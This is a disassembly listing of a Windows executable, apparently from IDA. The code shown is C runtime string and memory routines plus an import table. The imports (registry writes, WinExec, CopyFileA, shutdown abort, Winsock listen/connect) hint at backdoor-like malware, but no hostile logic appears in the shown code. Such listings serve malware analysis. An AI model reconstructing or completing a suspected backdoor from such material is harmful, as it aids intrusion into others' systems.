sub_404600 proc near ; CODE XREF: sub_4035C9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404683
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404624
shr ecx, 2
jnz short loc_404691
jmp short loc_404645
; ---------------------------------------------------------------------------
loc_404624: ; CODE XREF: sub_404600+1B�j
; sub_404600+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404652
test al, al
jz short loc_40465A
test esi, 3
jnz short loc_404624
mov ebx, ecx
shr ecx, 2
jnz short loc_404691
loc_404640: ; CODE XREF: sub_404600+8F�j
and ebx, 3
jz short loc_404652
loc_404645: ; CODE XREF: sub_404600+22�j
; sub_404600+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40467E
dec ebx
jnz short loc_404645
loc_404652: ; CODE XREF: sub_404600+2B�j
; sub_404600+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40465A: ; CODE XREF: sub_404600+2F�j
; DATA XREF: .data:00426D05�o
test edi, 3
jz short loc_404674
loc_404662: ; CODE XREF: sub_404600+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4046F6
test edi, 3
jnz short loc_404662
loc_404674: ; CODE XREF: sub_404600+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4046E7
loc_40467B: ; CODE XREF: sub_404600+7F�j
; sub_404600+F4�j
mov [edi], al
inc edi
loc_40467E: ; CODE XREF: sub_404600+4D�j
dec ebx
jnz short loc_40467B
pop ebx
pop esi
loc_404683: ; CODE XREF: sub_404600+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404689: ; CODE XREF: sub_404600+A9�j
; sub_404600+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404640
loc_404691: ; CODE XREF: sub_404600+20�j
; sub_404600+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404689
test dl, dl
jz short loc_4046DB
test dh, dh
jz short loc_4046D1
test edx, 0FF0000h
jz short loc_4046C7
test edx, 0FF000000h
jnz short loc_404689
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046C7: ; CODE XREF: sub_404600+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_404600+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_404600+AD�j
xor edx, edx
mov [edi], edx
loc_4046DF: ; CODE XREF: sub_404600+C5�j
; sub_404600+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4046F1
loc_4046E7: ; CODE XREF: sub_404600+79�j
xor eax, eax
loc_4046E9: ; CODE XREF: sub_404600+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4046E9
loc_4046F1: ; CODE XREF: sub_404600+E5�j
and ebx, 3
jnz short loc_40467B
loc_4046F6: ; CODE XREF: sub_404600+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_404600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046FE proc near ; CODE XREF: sub_403AE6+BE�p
; sub_403AE6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405470
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4070DC, edi
jnz short loc_404774
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405424
mov esi, 100h
push esi
push edi
call ds:dword_405098 ; LCMapStringW
test eax, eax
jz short loc_404752
mov ds:dword_4070DC, ebx
jmp short loc_404774
; ---------------------------------------------------------------------------
loc_404752: ; CODE XREF: sub_4046FE+4A�j
push edi
push edi
push ebx
push offset dword_406F38
push esi
push edi
call ds:dword_40509C ; LCMapStringA
test eax, eax
jz loc_40488C
mov ds:dword_4070DC, 2
loc_404774: ; CODE XREF: sub_4046FE+2E�j
; sub_4046FE+52�j
cmp [ebp+arg_C], edi
jle short loc_404789
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404922
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404789: ; CODE XREF: sub_4046FE+79�j
mov eax, ds:dword_4070DC
cmp eax, 2
jnz short loc_4047B0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_40509C ; LCMapStringA
jmp loc_40488E
; ---------------------------------------------------------------------------
loc_4047B0: ; CODE XREF: sub_4046FE+93�j
cmp eax, 1
jnz loc_40488C
cmp [ebp+arg_18], edi
jnz short loc_4047C6
mov eax, ds:dword_4070D4
mov [ebp+arg_18], eax
loc_4047C6: ; CODE XREF: sub_4046FE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_405078 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40488C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404821
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404821: ; CODE XREF: sub_4046FE+10E�j
cmp [ebp+var_24], edi
jz short loc_40488C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_405078 ; MultiByteToWideChar
test eax, eax
jz short loc_40488C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40488C
test byte ptr [ebp+arg_4+1], 4
jz short loc_4048A0
cmp [ebp+arg_14], edi
jz loc_40491B
cmp esi, [ebp+arg_14]
jg short loc_40488C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
test eax, eax
jnz loc_40491B
loc_40488C: ; CODE XREF: sub_4046FE+66�j
; sub_4046FE+B5�j ...
xor eax, eax
loc_40488E: ; CODE XREF: sub_4046FE+AD�j
; sub_4046FE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4046FE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048D4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4048D4: ; CODE XREF: sub_4046FE+1C2�j
cmp ebx, edi
jz short loc_40488C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
test eax, eax
jz short loc_40488C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4048FB
push edi
push edi
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4046FE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_404901: ; CODE XREF: sub_4046FE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4050C8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40488C
loc_40491B: ; CODE XREF: sub_4046FE+165�j
; sub_4046FE+188�j
mov eax, esi
jmp loc_40488E
sub_4046FE endp
; =============== S U B R O U T I N E =======================================
sub_404922 proc near ; CODE XREF: sub_4046FE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40493F
loc_404932: ; CODE XREF: sub_404922+1B�j
cmp byte ptr [eax], 0
jz short loc_40493F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404932
loc_40493F: ; CODE XREF: sub_404922+E�j
; sub_404922+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40494A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40494A: ; CODE XREF: sub_404922+21�j
mov eax, edx
retn
sub_404922 endp
; =============== S U B R O U T I N E =======================================
sub_40494D proc near ; CODE XREF: sub_403CC8+1F�p
arg_0 = dword ptr 4
mov eax, ds:dword_4070E4
test eax, eax
jz short loc_404965
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404965
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_40494D+7�j
; sub_40494D+12�j
xor eax, eax
retn
sub_40494D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_403D93+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404990
cmp edi, eax
jb loc_404B08
loc_404990: ; CODE XREF: sub_404970+16�j
test edi, 3
jnz short loc_4049AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
loc_4049AC: ; CODE XREF: sub_404970+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4049C4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4049CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4049C4: ; CODE XREF: sub_404970+46�j
jmp dword ptr ds:loc_404AC8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4049CC: ; CODE XREF: sub_404970+31�j
; sub_404970+8E�j ...
jmp ds:off_404A4C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4049E0
dd offset loc_404A0C
dd offset loc_404A30
; ---------------------------------------------------------------------------
loc_4049E0: ; DATA XREF: sub_404970+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A0C: ; DATA XREF: sub_404970+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404A30: ; DATA XREF: sub_404970+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404A4C dd offset loc_404AAF ; DATA XREF: sub_404970:loc_4049CC�r
dd offset loc_404A9C
dd offset loc_404A94
dd offset loc_404A8C
dd offset loc_404A84
dd offset loc_404A7C
dd offset loc_404A74
dd offset loc_404A6C
; ---------------------------------------------------------------------------
loc_404A6C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404A74: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404A7C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404A84: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404A8C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404A94: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404A9C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404AAF: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970:off_404A4C�o
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AB8 dd offset loc_404AC8 ; DATA XREF: sub_404970+35�r
; sub_404970+92�r ...
dd offset loc_404AD0
dd offset loc_404ADC
dd offset loc_404AF0
; ---------------------------------------------------------------------------
loc_404AC8: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404ADC: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AF0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B08: ; CODE XREF: sub_404970+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404B3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B30: ; CODE XREF: sub_404970+1B1�j
; sub_404970+208�j ...
neg ecx
jmp ds:off_404C00[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B3C: ; CODE XREF: sub_404970+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404B54
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_404B54+4[eax*4]
; ---------------------------------------------------------------------------
loc_404B54: ; CODE XREF: sub_404970+1D6�j
; DATA XREF: sub_404970+1DD�r
jmp ds:off_404C50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404B67+1
dd offset loc_404B88
; ---------------------------------------------------------------------------
mov al, 4Bh
inc eax
loc_404B67: ; DATA XREF: sub_404970+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B88: ; DATA XREF: sub_404970+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C04
dd offset loc_404C0C
dd offset loc_404C14
dd offset loc_404C1C
dd offset loc_404C24
dd offset loc_404C2C
dd offset loc_404C34
off_404C00 dd offset loc_404C47 ; DATA XREF: sub_404970+1C2�r
; ---------------------------------------------------------------------------
loc_404C04: ; DATA XREF: sub_404970+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404C0C: ; DATA XREF: sub_404970+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404C14: ; DATA XREF: sub_404970+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404C1C: ; DATA XREF: sub_404970+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404C24: ; DATA XREF: sub_404970+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404C2C: ; DATA XREF: sub_404970+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404C34: ; DATA XREF: sub_404970+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404C47: ; CODE XREF: sub_404970+1C2�j
; DATA XREF: sub_404970:off_404C00�o
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404C50 dd offset loc_404C60 ; DATA XREF: sub_404970+1B7�r
; sub_404970:loc_404B54�r ...
dd offset loc_404C68
dd offset loc_404C78
dd offset loc_404C8C
; ---------------------------------------------------------------------------
loc_404C60: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C68: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C8C: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404970 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404CA6 proc near ; CODE XREF: sub_4033C0+13�p
jmp ds:dword_405080
sub_404CA6 endp
; ---------------------------------------------------------------------------
dd 0D5h dup(0)
dword_405000 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_405004 dd 77DFC41Bh ; resolved to->ADVAPI32.RegOpenKeyAdword_405008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_40500C dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B08+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401EF0+F8�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_402029:loc_402095�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404478+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403D2A+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403AE6+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_40371C+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_40371C+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40371C+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403D93+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_4031D7+166�r
dword_405098 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_4046FE+14D�r ...
dword_40509C dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_4046FE+A7�r
dword_4050A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050A4 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_4031D7+59�r
dword_4050A8 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050AC dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050B0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402B10+91�r
dword_4050B4 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050B8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4046FE+20D�r
dword_4050CC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_4030A5+E1�r
dword_4050D0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050D4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050D8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_4035C9+143�r
align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 71AC1028h ; resolved to->WS2_32.acceptdword_4050EC dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40159E+2DD�r ...
dword_4050F0 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401398+151�r ...
dword_4050F4 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40127D+27�r ...
dword_4050F8 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40127D+51�r ...
dword_4050FC dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_40127D+6C�r ...
dword_405100 dd 71AB88D3h ; resolved to->WS2_32.listendword_405104 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_405108 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_40510C dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4011D5+7�r ...
dword_405110 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4011D5+1E�r ...
dword_405114 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_405118 dd 71AB3E00h ; resolved to->WS2_32.binddword_40511C dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40127D+10F�r ...
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h
; DATA XREF: sub_40283E+5�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4035C9+119�o
align 4
asc_4053E8 db 0Ah ; DATA XREF: sub_4035C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4035C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4035C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4035C9+7D�o
align 4
dword_405424 dd 0 ; sub_4046FE+36�o
dword_405428 dd 0FFFFFFFFh, 403815h, 403819haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404573+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404573+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404573+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404573+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: sub_4046FE+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 77E34D78h, 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 0
